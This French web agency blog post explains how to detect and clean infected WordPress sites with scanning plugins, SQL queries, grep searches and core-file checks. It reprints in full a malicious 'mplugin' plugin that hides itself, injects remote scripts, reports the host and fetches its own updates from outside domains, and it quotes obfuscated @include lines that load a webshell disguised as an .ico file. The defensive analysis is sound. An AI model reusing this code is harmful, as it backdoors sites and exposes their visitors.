{"id":4308,"date":"2021-05-31T09:30:27","date_gmt":"2021-05-31T09:30:27","guid":{"rendered":"https:\/\/acinonyxweb.agency\/?p=4308"},"modified":"2021-12-29T16:47:25","modified_gmt":"2021-12-29T16:47:25","slug":"votre-site-est-sans-doute-infecte-sans-que-vous-le-sachiez-comment-detecter-nettoyer-les-virus-dun-wordpress","status":"publish","type":"post","link":"https:\/\/acinonyxweb.agency\/fr\/cybersecurite\/votre-site-est-sans-doute-infecte-sans-que-vous-le-sachiez-comment-detecter-nettoyer-les-virus-dun-wordpress\/","title":{"rendered":"Votre site est sans doute infect\u00e9 sans que vous le sachiez. Comment d\u00e9tecter et nettoyer les virus d’un WordPress ?"},"content":{"rendered":"
[vc_row][vc_column][vc_column_text]WordPress<\/span> \u00e9tant le CMS le plus populaire au monde, cela a fait de lui une cible privil\u00e9gi\u00e9e des hackers.<\/span> Ainsi, il est devenu habituel que lors d’interventions courantes pour des clients nous apercevons de nombreuses backdoors bien dissimul\u00e9es dont l’administrateur n’avait pas connaissance : le but pour les pirates est de rester le plus discret possible.<\/span><\/p>\n

 <\/p>\n

Aujourd’hui les sites ne font pas forc\u00e9ment l’objet de defaces,<\/span><\/em> d’affichage<\/span> de publicit\u00e9s (spamware), de g\u00e9n\u00e9rer des articles et des liens vers des sites \u00e9tranges… Ces sites sont exploit\u00e9s par les attaquants de la mani\u00e8re la plus discr\u00e8te possible pour ne pas se faire d\u00e9celer et retirer, c’est ce que l’on nomme : advanced persistent threat<\/em>.<\/span><\/p>\n

 <\/p>\n

En effet, dans la majorit\u00e9 des cas, les sites touch\u00e9s sont ceux qui ne sont plus mis \u00e0 jour.<\/span> WordPress<\/span> propose r\u00e9guli\u00e8rement de mettre \u00e0 jour son c\u0153ur\/core afin de patcher<\/span> des failles critiques tout au long de l’ann\u00e9e, il en va de m\u00eame pour les plugins<\/span>.<\/span> Si vous ne les mettez pas \u00e0 jour et qu’un de ces plugins<\/span> non mis \u00e0 jour contient une faille, alors il ne faudra que 5 minutes \u00e0 un hacker pour le d\u00e9couvrir, notamment gr\u00e2ce \u00e0 des sites tels que WP Sec.<\/span><\/p>\n

Une faille plus critique est celle des h\u00e9bergements partag\u00e9s mutualis\u00e9s : un site qui n’est pas le votre infecte le serveur qui vous infecte \u00e0 son tour. Ainsi, les utilisateurs de Siteground ont \u00e9t\u00e9 victimes d’infections tour \u00e0 tour d’infection de leur site.<\/a><\/p>\n

C’est pour cela que nous recommandons nos h\u00e9bergements d\u00e9di\u00e9s (un serveur unique pour vous seul)<\/a>.<\/p>\n

 <\/p>\n

Si vous lisez aujourd’hui cet article, il est fort probable que vous ayez d\u00e9j\u00e0 eu \u00e0 faire \u00e0 ce cas de figure et que vous recherchez des solutions de diagnostic puis de d\u00e9sinfection.<\/span> Alors ne cherchez pas plus loin :<\/span> cet article r\u00e9sume les principales actions \u00e0 mener afin de nettoyer votre site WordPress de tout backdoors, shells, malwares et virus<\/span>.<\/span><\/p>\n

 <\/p>\n

 <\/p>\n

Analyser son site WordPress \u00e0 l’aide de plugins<\/h2>\n

La premi\u00e8re chose \u00e0 faire et la plus simple de notre liste, est d’installer un plugin directement sur votre WordPress. Il existe plusieurs plugins d\u00e9di\u00e9s \u00e0 la s\u00e9curit\u00e9 sur WordPress, mais peu proposent des analyses compl\u00e8tes depuis le back-office.<\/p>\n

 <\/p>\n

Le plugin gratuit qui nous int\u00e9resse dans ce cas de figure est :<\/p>\n

Wordfence Security \u2013 Firewall & Malware Scan<\/strong><\/a><\/p>\n

\"Wordfence\"<\/p>\n

Gr\u00e2ce \u00e0 ce plugin, vous pourrez en deux clics lancer une analyse du serveur, des fichiers modifi\u00e9s, des malwares les plus communs et pouvant \u00eatre d\u00e9tect\u00e9s par le plugin… En bref, un check-up complet pour votre site. C’est la premi\u00e8re chose \u00e0 faire en cas de soup\u00e7on de piratage.<\/p>\n

Attention toutefois, le plugin peut parfois designer certains fichiers comme malicieux car contenant du code chiffr\u00e9 en base64, hors ce n’est pas toujours le cas. Pensez donc \u00e0 toujours faire du sauvegarde de vos fichiers ou \u00e0 faire appel \u00e0 un expert.<\/p>\n

 <\/p>\n

 <\/p>\n

ATTENTION La majorit\u00e9 des virus WordPress sont con\u00e7us pour ne pas \u00eatre d\u00e9tect\u00e9 par ces antimalwares WordPress<\/strong><\/p>\n

 <\/p>\n

 <\/p>\n

Cherchez et supprimez les comptes administrateurs inconnus ainsi que les articles et pages que vous n’avez pas faits<\/h2>\n

 <\/p>\n

Bloquez le XML-RPC et l’API REST si vous ne les utilisez pas<\/h2>\n

Vous n’avez jamais entendu parler de ces fonctionnalit\u00e9s ? Il y a donc de grandes chances pour que vous n’en ayez pas besoin. Elles permettent \u00e0 un malware d’ex\u00e9cuter du code \u00e0 distance et de se r\u00e9g\u00e9n\u00e9rer, il vaut mieux donc les bloquer pr\u00e9ventivement.<\/p>\n

 <\/p>\n

Tout cela se fait en quelques clics avec :<\/p>\n

iThemes Security (anciennement Better WP Security)<\/a><\/p>\n

\"configuration<\/p>\n

Apr\u00e8s avoir lanc\u00e9 la s\u00e9curisation automatique du site nous vous conseillons d’inscrire votre site au r\u00e9seau antibruteforce. Cela \u00e0 l’avantage, m\u00eame si votre site est d\u00e9j\u00e0 contamin\u00e9, de bloquer l’ip de l’attaquant et de son serveur de contr\u00f4le \u00e0 distance (C&C botnet…).<\/p>\n

 <\/p>\n

Dans les options allez dans les param\u00e8tres de fonctionnalit\u00e9s WordPress :
\n\"itheme
\nPuis cochez et s\u00e9lectionnez les options suivantes (toutes celles recommand\u00e9es en fait) :<\/p>\n

\"wordpress<\/p>\n

 <\/p>\n

Vous limiterez ainsi les risques de r\u00e9infection : en g\u00e9n\u00e9ral lorsque votre WordPress est infect\u00e9 par un malware, m\u00eame si vous le supprimez celui-ci est automatiquement r\u00e9inject\u00e9 par un serveur \u00e0 distance contr\u00f4lant en permanence le niveau d’infection de votre site via les fonctionnalit\u00e9s que nous venons de d\u00e9sactiver.<\/p>\n

En les bloquant le virus ne sera donc plus r\u00e9inject\u00e9 !<\/p>\n

 <\/p>\n

Analysez les tables de la base de donn\u00e9es du WordPress<\/h2>\n

Il est possible au sein d’un site WordPress d’injecter du code PHP et JavaScript directement depuis une table de la base de donn\u00e9es. De nombreux plugins existent pour cela, mais ce ne sont pas ces plugins qui nous int\u00e9ressent ici : seulement la m\u00e9thode employ\u00e9e pour ex\u00e9cuter du code malicieux.<\/p>\n

Certains malwares relativement malins enregistrent une balise <script> directement dans la table wp-options. Pensez-donc \u00e0 effectuer une requ\u00eate SQL de ce type afin de vous assurer que vous n’\u00eates pas affect\u00e9 :<\/p>\n

SELECT * FROM `wp_options` WHERE (CONVERT(`option_name` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`option_value` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`autoload` USING utf8mb4) LIKE '%ad_code%') LIMIT 50<\/pre>\n
Manuellement, il vous suffit d’aller dans la base de donn\u00e9es de votre wordpress puis dans la table options (par d\u00e9faut wp-options mais votre pr\u00e9fixe peut changer) puis d’y chercher<\/p>\n
<script\r\n<\/pre>\n
ou encore<\/p>\n
<php\r\n<\/pre>\n
Exemple de code viral chez l’un de nos clients :<\/p>\n
\"code<\/p>\n
'ad_code', '\\n<script type=\\'text\/javascript\\' src=\\'\/\/aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js\\'><\/script>\\n<script type=\\'text\/javascript\\' src=\\'\/\/aanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js\\'><\/script>\\n', 'yes'<\/pre>\n
Ici le site va automatiquement ex\u00e9cuter les fichiers distants :<\/p>\n
aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js\r\naanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js\r\n<\/pre>\n
lesquels sont des injecteurs viraux wordpress chiffr\u00e9s (pas besoin d’\u00eatre ing\u00e9nieur informaticien virologue pour comprendre que du code ex\u00e9cut\u00e9 \u00e0 distance chiffr\u00e9 sur un wordpress a de grandes chances d’\u00eatre nuisible).<\/p>\n
 <\/p>\n
Encore une fois, attention \u00e0 ce que vous trouverez et supprimerez, car il peut parfois s’agir de r\u00e9sultats provenant de simple plugins de publicit\u00e9s, chargeant des publicit\u00e9s Google Ads (par exemple). Ou encore le code inject\u00e9 par des plugins l\u00e9gitimes comme code snippets<\/a>.<\/p>\n
 <\/p>\n
En cas de doute nous vous recommandons de vous tourner vers Acinonyx Web Agency : notre personnel exp\u00e9riment\u00e9 saura diff\u00e9rencier un malware d’une fonction conventionnelle chiffr\u00e9e.<\/strong><\/p>\n
 <\/p>\n
Analysez les changements au niveau des fichiers c\u00f4t\u00e9 serveur<\/h2>\n
Pour cette \u00e9tape, vous allez devoir vous connecter en SSH afin de pouvoir ex\u00e9cuter des lignes de commandes et en analyser le retour. Pour chaque commande, pensez \u00e0 remplacer \u00ab\u00a0\/var\/www\/wordpress\/\u00a0\u00bb par le chemin de votre site.<\/p>\n
En FTP, il est inutile de se fier \u00e0 la date de changement de fichiers car elle peut \u00eatre ais\u00e9ment falsifi\u00e9e. En revanche le chmod peut \u00eatre un bon indicateur…<\/p>\n
 <\/p>\n
 <\/p>\n
Comme d’habitude, prudence avant de supprimer des fichiers ou des bouts de code qui pourraient ne pas \u00eatre infect\u00e9s (faux positifs).<\/p>\n
<\/h3>\n
 <\/p>\n
Cherchez mplugin.php dans votre dossier de plugin wordpress<\/h2>\n
Infection la plus courante elle m\u00e9rite une partie enti\u00e8re. De nombreux clients t\u00e9l\u00e9chargent des th\u00e8mes ou plugins nulled ou crack\u00e9s. Sauf que rien n’est gratuit et vous en payez le prix plus tard : votre site affiche de la publicit\u00e9 pour payer le hacker :<\/p>\n
\"\"<\/p>\n
Ici mplugins.php (m\u00eame avec un \u00ab\u00a0s\u00a0\u00bb de plus, le malware reste le m\u00eame).<\/p>\n
Vous ne verrez jamais rien car le plugin se dissimule dans la liste des plugins, enregistre les ips des admins et leur dissimule la publicit\u00e9 qui ne sera visible que pour les visiteurs tiers :<\/p>\n
<?php\r\n\/**\r\n * Plugin Name: Monetization Code plugin\r\n * Description: mplugin Shows cusom codes to display your ad codes.\r\n * Author: aerin Singh\r\n * Version: 1.0\r\n *\/\r\nerror_reporting(0);\r\nini_set('display_errors', 0);\r\n$plugin_key='4ab94009633ce74d72c165d5b5577957';\r\n$version='1.2';\r\n\r\nadd_action('admin_menu', function() {\r\n    add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );\r\n    remove_submenu_page( 'options-general.php', 'mplugin' );\r\n});\r\n\r\n\r\n\r\nadd_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');\r\nfunction salcode_add_plugin_page_settings_mplugin( $links ) {\r\n    $links[] = '<a href=\"' .\r\n        admin_url( 'options-general.php?page=mplugin' ) .\r\n        '\">' . __('Settings') . '<\/a>';\r\n    return $links;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\nadd_action( 'admin_init', function() {\r\n\r\n    register_setting( 'mplugin-settings', 'default_mont_options' );\r\n    register_setting( 'mplugin-settings', 'ad_code' );\r\n    register_setting( 'mplugin-settings', 'hide_admin' );\r\n    register_setting( 'mplugin-settings', 'hide_logged_in' );\r\n    register_setting( 'mplugin-settings', 'display_ad' );\r\n    register_setting( 'mplugin-settings', 'search_engines' );\r\n    register_setting( 'mplugin-settings', 'auto_update' );\r\n    register_setting( 'mplugin-settings', 'ip_admin');\r\n    register_setting( 'mplugin-settings', 'cookies_admin' );\r\n    register_setting( 'mplugin-settings', 'logged_admin' );\r\n    register_setting( 'mplugin-settings', 'log_install' );\r\n    \r\n});\r\n\r\n$ad_code=\"\r\n<script type='text\/javascript' src='\/\/aanqylta.com\/bb\/2f\/82\/bb2f8268f180d7e0e1613e43c3e34d23.js'><\/script>\r\n<script type='text\/javascript' src='\/\/aanqylta.com\/a4\/8a\/80\/a48a807e59fb8d5503642ee3fcbb8f87.js'><\/script>\r\n\";\r\n\r\n$hide_admin='on';\r\n$hide_logged_in='on';\r\n$display_ad='organic';\r\n$search_engines='google.,\/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';\r\n$auto_update='on';\r\n$ip_admin='on';\r\n$cookies_admin='on';\r\n$logged_admin='on';\r\n$log_install='';\r\n\r\nfunction mplugin_page() {\r\n ?>\r\n   <div class=\"wrap\">\r\n<form action=\"options.php\" method=\"post\">\r\n       <?php\r\n       settings_fields( 'mplugin-settings' );\r\n       do_settings_sections( 'mplugin-settings' );\r\n$ad_code='';\r\n\r\n$hide_admin='on';\r\n$hide_logged_in='on';\r\n$display_ad='organic';\r\n$search_engines='google.,\/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';\r\n$auto_update='on';\r\n$ip_admin='on';\r\n$cookies_admin='on';\r\n$logged_admin='on';\r\n$log_install='';\r\n\r\n       ?>\r\n       <h2>mplugin Plugin<\/h2>\r\n       <table>\r\n             \r\n <tr>\r\n                <th>Ad Code<\/th>\r\n                <td><textarea placeholder=\"\" name=\"ad_code\" rows=\"5\" cols=\"130\"><?php echo get_option('ad_code',$ad_code) ; ?><\/textarea><\/td>\r\n            <\/tr>\r\n            \r\n            \r\n            \r\n<tr>\r\n                <th>Hide ads to :<\/th>\r\n                <td>\r\n                    <input type=\"hidden\" id=\"default_mont_options\" name=\"default_mont_options\" value=\"on\">\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"hide_admin\" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>admins\r\n                    <\/label>\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"hide_logged_in\" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>logged in users\r\n                    <\/label>\r\n                    <br\/>\r\n                 \r\n\r\n                <\/td>\r\n            <\/tr>\r\n            \r\n            \r\n            \r\n            <tr>\r\n                <th>Recognize admin by :<\/th>\r\n                <td>\r\n\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"logged_admin\" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>logged in\r\n                    <\/label>\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"ip_admin\" id=\"ip_admin\"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked=\"checked\"' : '' ?> \/>By IP addresses\r\n                    <\/label>\r\n                                        <label>\r\n                        <input type=\"checkbox\" name=\"cookies_admin\" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>By Cookies\r\n                    <\/label>\r\n                \r\n                 \r\n\r\n                <\/td>\r\n            <\/tr>\r\n            \r\n            \r\n            \r\n            <tr>\r\n                <th>Display ads to :<\/th>\r\n                <td>\r\n                 \t\t\t\t         <select name=\"display_ad\">\r\n                        \r\n                        <option value=\"organic\" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected=\"selected\"' : ''; ?>>Organic traffic only<\/option>\r\n                        <option value=\"all_visitors\" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected=\"selected\"' : ''; ?>>All Visitors<\/option>\r\n                        \r\n                    <\/select>\r\n\r\n                <\/td>\r\n            <\/tr>\r\n\r\n            <tr>\r\n                <th>Search Engines<\/th>\r\n                <td><input type=\"text\" placeholder=\"Internal title\" name=\"search_engines\" value=\"<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>\" size=\"80\" \/><p class=\"description\">\r\n            comma separated  <\/p>\r\n                <\/td>\r\n            <\/tr>\r\n \r\n \r\n <tr>\r\n                <th>Auto Update :<\/th>\r\n                <td>\r\n\r\n                    <label>\r\n                        <input type=\"checkbox\" name=\"auto_update\" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked=\"checked\"' : ''; ?> \/>auto update plugin\r\n                    <\/label><br\/>\r\n                 \r\n\r\n                <\/td>\r\n            <\/tr>\r\n \r\n            <tr>\r\n                <td><?php submit_button(); ?><\/td>\r\n            <\/tr>\r\n \r\n        <\/table>\r\n       \r\n       \r\n       \r\n     <\/form>\r\n   <\/div>\r\n <?php\r\n}\r\n\r\n\/*************************log install***************************\/\r\nif(get_option('log_install') !=='1')\r\n{\r\n    if(!$log_installed = @file_get_contents(\"http:\/\/www.tomndo.com\/o2.php?host=\".$_SERVER[\"HTTP_HOST\"]))\r\n{\r\n    $log_installed = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/o2.php?host=\".$_SERVER[\"HTTP_HOST\"]);\r\n}\r\n}\r\n\/*************************set default options***************************\/\r\n\r\nif(get_option('default_mont_options') !=='on')\r\n{\r\nupdate_option('ip_admin', $ip_admin);\r\nupdate_option('ad_code', $ad_code);\r\nupdate_option('cookies_admin', $cookies_admin);\r\nupdate_option('logged_admin', $logged_admin);\r\nupdate_option('hide_admin', $hide_admin);\r\nupdate_option('hide_logged_in', $hide_logged_in);\r\nupdate_option('display_ad', $display_ad);\r\nupdate_option('search_engines', $search_engines);\r\nupdate_option('auto_update', $auto_update);\r\nupdate_option('log_install', '1');\r\n}\r\n\r\n\/************************************************************************\/\r\ninclude_once(ABSPATH . 'wp-includes\/pluggable.php'); \r\n\r\nif ( ! function_exists( 'display_ad_single' ) ) {  \r\n\r\nfunction display_ad_single($content){ \r\nif(is_single())\r\n{\r\n\r\n$content=$content.get_option('ad_code');;\r\n}\r\nreturn $content;\r\n} \r\n\r\nfunction display_ad_footer(){ \r\nif(!is_single())\r\n{\r\necho get_option('ad_code');\r\n}\r\n} \r\n\r\n\r\n\/\/setting cookies if admin logged in\r\nfunction setting_admin_cookie() {\r\n  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);\r\n  }\r\n\r\nif(get_option('cookies_admin')=='on')\r\n{\r\n\r\nif(is_user_logged_in())\r\n{\r\nadd_action( 'init', 'setting_admin_cookie',1 );\r\n}\r\n}\r\n\r\n\r\n\/\/log admin IP addresses\r\n$vis_ip=getVisIpAddr_mplugin();\r\nif(get_option('ip_admin')=='on')\r\n{\r\nif(current_user_can('edit_others_pages'))\r\n{\r\n\r\nif (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))\r\n{\r\n$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');\r\n}\r\n\r\nif (stripos($ip, $vis_ip) === false)\r\n{\r\n$ip.=$vis_ip.'\r\n';\r\n@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);\r\n\r\n}\r\n\r\n}\r\n}\/\/ end if log admins ip\r\n\r\n\r\n\r\n\r\n\/\/add cookies to organic traffic\r\n\r\nif(get_option('display_ad')=='organic')\r\n{\r\n\r\n$search_engines = explode(',', get_option('search_engines'));\r\n\r\n$referer = $_SERVER['HTTP_REFERER'];\r\n$SE = array('google.','\/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');\r\nforeach ($search_engines as $search) {\r\n  if (strpos($referer,$search)!==false) {\r\n    setcookie(\"organic\", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); \r\n    $organic=true;\r\n  }\r\n}\r\n\r\n}\/\/end\r\n\r\n\r\n\r\n\r\n\/\/display ad\r\n\r\nif(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) \r\n{\r\n\r\n$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');\r\nif (stripos($ips, $vis_ip) === false)\r\n{\r\n\/*****\/\r\nif(get_option('display_ad')=='organic')\r\n{\r\nif($organic==true || isset($_COOKIE['organic']))\r\n{\r\nadd_filter('the_content','display_ad_single');\r\nadd_action('wp_footer','display_ad_footer'); \r\n}\r\n}\r\nelse\r\n{\r\nadd_filter('the_content','display_ad_single');\r\nadd_action('wp_footer','display_ad_footer');  \r\n}\r\n\r\n\/****\/\r\n\r\n}\r\n\r\n}\r\n\/*******************\/\r\n\r\n\r\n\r\n\r\n\r\n\/\/update plugin\r\n\r\nif(get_option('auto_update')=='on')\r\n{\r\n\r\nif( ini_get('allow_url_fopen') ) {\r\n\r\n\r\n\r\n        if (($new_version = @file_get_contents(\"http:\/\/www.tomndo.com\/update.php\") OR $new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/update.php\")) AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n        \r\n        \r\n                elseif ($new_version = @file_get_contents(\"http:\/\/www.tomndo.xyz\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n\r\n        elseif ($new_version = @file_get_contents(\"http:\/\/www.tomndo.top\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n}\r\nelse\r\n{\r\n            if (($new_version = @file_get_contents(\"http:\/\/www.tomndo.com\/update.php\") OR $new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.com\/update.php\")) AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n        \r\n        \r\n                elseif ($new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.xyz\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n\r\n\r\n        elseif ($new_version = @file_get_contents_mplugin(\"http:\/\/www.tomndo.top\/update.php\") AND stripos($new_version, $plugin_key) !== false) {\r\n\r\n            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {\r\n               @file_put_contents(__FILE__, $new_version);\r\n                \r\n            }\r\n        }\r\n}\r\n}\/\/end if auto update\r\n\r\n\/*********************************\/\r\n\r\n\r\n\r\n}\/\/ if function exist\r\n\r\n\r\n\r\n     function file_get_contents_mplugin($url)\r\n        {\r\n            $ch = curl_init();\r\n            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);\r\n            curl_setopt($ch, CURLOPT_HEADER, 0);\r\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n            curl_setopt($ch, CURLOPT_URL, $url);\r\n            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);\r\n            $data = curl_exec($ch);\r\n            curl_close($ch);\r\n            return $data;\r\n        }\r\n\r\n\r\nfunction hide_plugin_mplugin() {\r\n  global $wp_list_table;\r\n  $hidearr = array('mplugin.php');\r\n  $myplugins = $wp_list_table->items;\r\n  foreach ($myplugins as $key => $val) {\r\n    if (in_array($key,$hidearr)) {\r\n      unset($wp_list_table->items[$key]);\r\n    }\r\n  }\r\n}\r\n\r\nadd_action('pre_current_active_plugins', 'hide_plugin_mplugin');\r\n\r\n        function getVisIpAddr_mplugin() { \r\n      \r\n    if (!empty($_SERVER['HTTP_CLIENT_IP'])) { \r\n        return $_SERVER['HTTP_CLIENT_IP']; \r\n    } \r\n    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { \r\n        return $_SERVER['HTTP_X_FORWARDED_FOR']; \r\n    } \r\n    else { \r\n        return $_SERVER['REMOTE_ADDR']; \r\n    } \r\n}\r\n\r\n?><\/pre>\n
m pour moneyplugin ou comment rentabiliser ses victimes.<\/p>\n
 <\/p>\n
Ici c’\u00e9tait Updraftplus le coupable, qui se trouve avec cette commande ssh :<\/p>\n
grep -r -i --include=\\*.php 'mplugin.php' \/var\/www\/\r\n<\/pre>\n
Traduction : qui a g\u00e9n\u00e9r\u00e9 mplugin ? Qu’il se d\u00e9nonce !<\/p>\n
En g\u00e9n\u00e9ral il infecte \u00e9galement le fichier \/wp-include\/functions.php qu’il vous faudra \u00e9galement d\u00e9sinfecter.<\/p>\n
 <\/p>\n
Nous ne pouvons que vous conseiller de supprimer les plugins crack\u00e9s\/nulled en cause bien que supprimer la partie infect\u00e9e suffise. Non seulement cela est ill\u00e9gal mais les plugins pirat\u00e9s sont toujours plus ou moins infect\u00e9 d’une mani\u00e8re ou d’une autre.<\/p>\n
 <\/p>\n
 <\/p>\n
N’oubliez pas : si c’est gratuit, c’est vous le produit\u00a0<\/strong><\/p>\n
 <\/p>\n
 <\/p>\n
Analysez les fichiers natifs du core WordPress<\/h3>\n
 <\/p>\n
Premi\u00e8re chose \u00e0 faire : v\u00e9rifier si les fichiers natifs du WordPress ont \u00e9t\u00e9s modifi\u00e9s. C’est l’\u00e9tape la plus simple, il vous suffit pour cela d’ex\u00e9cuter la commande suivante :<\/p>\n
nano \/var\/www\/wordpress\/index.php\r\nnano \/var\/www\/wordpress\/wp-config.php\r\nnano \/var\/www\/wordpress\/wp-settings.php\r\n<\/pre>\n
Et de v\u00e9rifier si ces fichiers contiennent en haut ou en bas, du code chiffr\u00e9 ou un \u00ab\u00a0@include\u00a0\u00bb. Cela peut soit \u00eatre une suite de lettres et de mots incompr\u00e9hensibles, soit du code en base64.<\/p>\n
Si c’est le cas : supprimez-les<\/strong>.<\/p>\n
 <\/p>\n
Vous pouvez aussi utiliser cette commande pour lister les fichiers .php contenant des \u00ab\u00a0@include\u00a0\u00bb :<\/p>\n
grep -r -i --include=\\*.php '*\/ @include' \/var\/www\/<\/pre>\n
 <\/p>\n
Exemple de code infect\u00e9 :<\/p>\n
@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\\057www\\057htm\\154\/wp\\055inc\\154ude\\163\/Si\\155ple\\120ie\/\\056639\\146691\\061.ic\\157\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057v\\141r\\057w\\167w\\057h\\164m\\154\/\\167p\\055i\\156c\\154u\\144e\\163\/\\123i\\155p\\154e\\120i\\145\/\\0566\\0639\\1466\\0711\\061.\\151c\\157\";\r\n@include \"\\057var\\057www\\057htm\\154\/wp\\055inc\\154ude\\163\/Si\\155ple\\120ie\/\\056639\\146691\\061.ic\\157\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";\r\n@include \"\\057v\\141r\\057w\\167w\\057h\\164m\\154\/\\167p\\055i\\156c\\154u\\144e\\163\/\\123i\\155p\\154e\\120i\\145\/\\0566\\0639\\1466\\0711\\061.\\151c\\157\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";<\/pre>\n
Il s’agit de ce type de malware<\/a> : webshell obfusqu\u00e9 en .ico inject\u00e9 par droppeur (vous avez du t\u00e9l\u00e9charger un plugin sur une source non officielle).<\/p>\n
 <\/p>\n
Une fois d\u00e9chiffr\u00e9 sur https:\/\/www.unphp.net<\/a>, on se rend compte qu’il y a de multiples shellcodes en .ico qu’il vous faudra supprimer :<\/p>\n
